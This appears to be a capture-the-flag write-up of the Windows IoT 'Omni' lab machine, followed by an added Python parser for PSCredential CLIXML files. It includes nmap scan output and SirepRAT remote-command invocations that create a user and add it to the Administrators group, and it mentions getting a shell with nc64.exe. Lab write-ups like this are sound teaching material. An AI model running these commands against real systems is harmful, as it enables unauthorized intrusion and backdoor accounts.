Machine - Omni - Easy - Windows - Abandoned

PORT      STATE SERVICE    REASON
135/tcp   open  msrpc      syn-ack ttl 127
5985/tcp  open  wsman      syn-ack ttl 127
8080/tcp  open  http-proxy syn-ack ttl 127
29817/tcp open  unknown    syn-ack ttl 127
29819/tcp open  unknown    syn-ack ttl 127
29820/tcp open  unknown    syn-ack ttl 127
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
|_http-title: Site doesn't have a title.
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.92%I=7%D=10/24%Time=61757393%P=x86_64-pc-linux-gnu%r(
SF:NULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,
SF:"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x
SF:04G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\
SF:xc9}\xc8O\x12");
  • 135
    • rpcdump returns a lot of output
  • 5985 seems to be WinRM
    • But I don’t have any user/password
  • 8080
    • has basic auth (realm "Windows Device Portal") …
    • we could try to fuzz it…
      • 8080/FUZZ
      • 8080/FUZZ.asp
      • 8080/FUZZ.aspx
      • 8080/FUZZ.php
  • 29817
    • nothing on netcat
  • 29819
    • nc gets a PING back
  • 29820
    • nc gets back some odd-looking bytes

After looking more closely at the ports, it seems this is Windows IoT Core, and there is a public exploit that executes commands over the Sirep service: https://github.com/SafeBreach-Labs/SirepRAT

Since WinRM is already open, I will create a new user:

 python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c net user kozko kozko /add"

and give it administrator privileges:

 python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c net localgroup Administrators kozko /add"
 evil-winrm -i 10.10.10.204 -u kozko

didn’t work :(

On port 8080, now that we have a user, we can log in :)

With nc64.exe we got a shell.

In the folder c:\Data\Users\app there is a file user.txt with the following content:

type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">…</SS>
    </Props>
  </Obj>
</Objs>
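The user.txt above is not plain text but a PSCredential object serialized with Export-Clixml. The SS element holds the password as a SecureString that PowerShell protects with DPAPI, so it is bound to the user account (and machine) that created the file and cannot be decrypted off-box. The following Python is an added example, not code from the write-up: it parses that CLIXML layout, pulls out the UserName, and checks whether the Password element carries the DPAPI blob header (version DWORD 1 followed by the DPAPI provider GUID). The sample document is constructed, and the hex in its SS element is a placeholder, not a real blob from the machine.

```python
"""Parse a PowerShell CLIXML (Export-Clixml) PSCredential file.

Added example, not part of the original write-up. The sample below is
constructed; the hex in the Password element is a placeholder, not a
real DPAPI blob.
"""
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
PSCREDENTIAL_TYPE = "System.Management.Automation.PSCredential"

# DPAPI blob header: version 0x00000001 (little endian) followed by the
# DPAPI provider GUID {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in its
# on-disk byte order. ConvertFrom-SecureString without -Key emits this.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed sample modelled on the user.txt shown above (placeholder hex).
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0102030405</SS>
    </Props>
  </Obj>
</Objs>"""


def parse_pscredential(xml_text):
    """Return a summary dict for a CLIXML-serialized PSCredential.

    Raises ValueError if the document does not describe a PSCredential.
    """
    root = ET.fromstring(xml_text)
    ns = {"ps": PS_NS}
    obj = root.find("ps:Obj", ns)
    if obj is None:
        raise ValueError("no <Obj> element in CLIXML document")

    # The <TN> block lists the .NET type hierarchy of the serialized object.
    types = [t.text for t in obj.findall("ps:TN/ps:T", ns)]
    if PSCREDENTIAL_TYPE not in types:
        raise ValueError("not a PSCredential object: %r" % types)

    # <S> is a plain string, <SS> is a SecureString (hex-encoded blob).
    user_el = obj.find("ps:Props/ps:S[@N='UserName']", ns)
    pass_el = obj.find("ps:Props/ps:SS[@N='Password']", ns)
    if user_el is None or pass_el is None:
        raise ValueError("PSCredential missing UserName or Password property")

    password_hex = (pass_el.text or "").strip()
    try:
        blob = bytes.fromhex(password_hex)
    except ValueError:
        blob = b""

    # A DPAPI header means the SecureString was protected with the creating
    # user's DPAPI master key: only that account on that host can unwrap it
    # (e.g. via Import-Clixml). Hex without this header usually means
    # ConvertFrom-SecureString was run with an explicit -Key instead.
    is_dpapi = blob.startswith(DPAPI_HEADER)

    return {
        "username": user_el.text,
        "password_is_securestring": True,
        "password_hex": password_hex,
        "blob_len": len(blob),
        "is_dpapi_blob": is_dpapi,
        "types": types,
    }


if __name__ == "__main__":
    info = parse_pscredential(SAMPLE_CLIXML)
    print("UserName       :", info["username"])
    print("DPAPI protected:", info["is_dpapi_blob"])
    print("Blob length    :", info["blob_len"], "bytes")
```

Run it against a real Export-Clixml file by passing the file contents to parse_pscredential; the is_dpapi_blob flag tells you whether the secret is tied to the original user's DPAPI master key, which is the property that makes such a file safe to store only as long as that account is not compromised.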